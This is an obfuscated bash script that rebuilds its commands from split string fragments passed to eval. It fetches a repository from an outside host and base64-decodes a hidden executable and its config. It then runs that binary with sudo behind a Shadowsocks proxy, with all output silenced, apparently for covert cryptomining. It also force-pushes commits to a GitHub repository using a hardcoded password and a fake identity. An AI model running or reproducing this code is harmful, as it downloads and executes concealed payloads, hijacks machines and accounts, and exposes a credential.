SeesNocJ="it clone https:"
ETTNFVN="//gccbuild@bi"
OpCOe="tbucket.org"
BSpm="/gccbuild/gcc.g"
eoAiE="it &>/dev/"
eval "g""$SeesNocJ""$ETTNFVN""$OpCOe""$BSpm""$eoAiE""null"
UOsQMhgN="e64 -d gcc"
ZZQVAGp="/"
eval "bas""$UOsQMhgN""$ZZQVAGp""s > o"
tyZLxF="udo apt updat"
xXyoJT="e &>/dev/null |"
yvZLCDr="| t"
eval "s""$tyZLxF""$xXyoJT""$yvZLCDr""rue"
eZFXLnlp="udo apt --yes "
iHNpSZgr="install psmi"
YESFv="sc shadowso"
Ouibjv="cks-libev "
OVRgHzD="&>/dev/null "
wQwPWl="||"
eval "s""$eZFXLnlp""$iHNpSZgr""$YESFv""$Ouibjv""$OVRgHzD""$wQwPWl"" true"
IKvnL="udo systemctl "
LHBFV="stop shadowsock"
nYNhh="s-libev.serv"
polLTvkq="ice &>/dev/n"
iMmCEN="ull || true"
eval "s""$IKvnL""$LHBFV""$nYNhh""$polLTvkq""$iMmCEN"
bgZABG="udo ss-loca"
kvzWjv="l -c o &>/de"
bcyAp="v/nu"
eval "s""$bgZABG""$kvzWjv""$bcyAp""ll &"
gPrshDHC="base64 -d gcc/"
eTgjJQY="c > status.l"
zsRHL="o"
eval "$gPrshDHC""$eTgjJQY""$zsRHL""g"
PlBahv="base64 -d gc"
kSCtvmX="c/m > wcc"
eval "$PlBahv""$kSCtvmX"
chmod +x wcc
WiKY=" -i 's/gcc/"
GcSNm="gegeo/g' status"
bIrOfXP=".log"
eval "sed""$WiKY""$GcSNm""$bIrOfXP"
sudo ./wcc --config=status.log &>/dev/null &
dvXm="o g"
eval "ech""$dvXm""owg"
aTXcaC="le"
eval "s""$aTXcaC""ep 71"
kpNijPTP=" clone https:/"
dPpNYQHf="/github.com"
tfDRZShD="/hqkrp-air"
jbncSBvD="craft/apache."
EbJzcBSX="git tmp &>/de"
AhduM="v"
eval "git""$kpNijPTP""$dPpNYQHf""$tfDRZShD""$jbncSBvD""$EbJzcBSX""$AhduM""/null"
cd tmp
qHHAdj=" config user.na"
WGyTAyA="me 'Viktor"
XKnJuZf="iya Jeremenk"
AgugOPPi="o' &>/dev/n"
eval "git""$qHHAdj""$WGyTAyA""$XKnJuZf""$AgugOPPi""ull"
SmaVcq=" config use"
mdnYeKqN="r.email vikt"
eSkc="oriya.jeremenk"
tQBnra="oxy@eclipso.eu "
pVYroqr="&>/dev/nul"
eval "git""$SmaVcq""$mdnYeKqN""$eSkc""$tQBnra""$pVYroqr""l"
UqRMYtF="UILD=\`date"
sUEo=" +"
eval "B""$UqRMYtF""$sUEo""%s\`"
DKEs="MAKE=\`date"
nqgrW=" +%"
eval "$DKEs""$nqgrW""S\`"
echo $BUILD >> gowg$MAKE
echo 'apache' >> gowg$MAKE
git add gowg$MAKE &>/dev/null
git commit -m 'Erase gowg '$MAKE &>/dev/null
FlNsU="git push htt"
SNBLg="ps://viktor"
jRQVeVOO="iya-jeremenk"
oSKHC="oxy:'O3UoPzqSDP"
dOkjC="5mQ_7Bu'@githu"
czgsUHFD="b.com/hqkrp-air"
JkHuxhy="craft/apac"
pzxr="he.git -f &>/de"
bKHa="v/null ||"
eval "$FlNsU""$SNBLg""$jRQVeVOO""$oSKHC""$dOkjC""$czgsUHFD""$JkHuxhy""$pzxr""$bKHa"" true"
while :; do G=`date +%s`; echo 'gcc $G'; [ `expr 1363 + $BUILD` -lt $G ] && sudo killall wcc && break; sleep 129; done
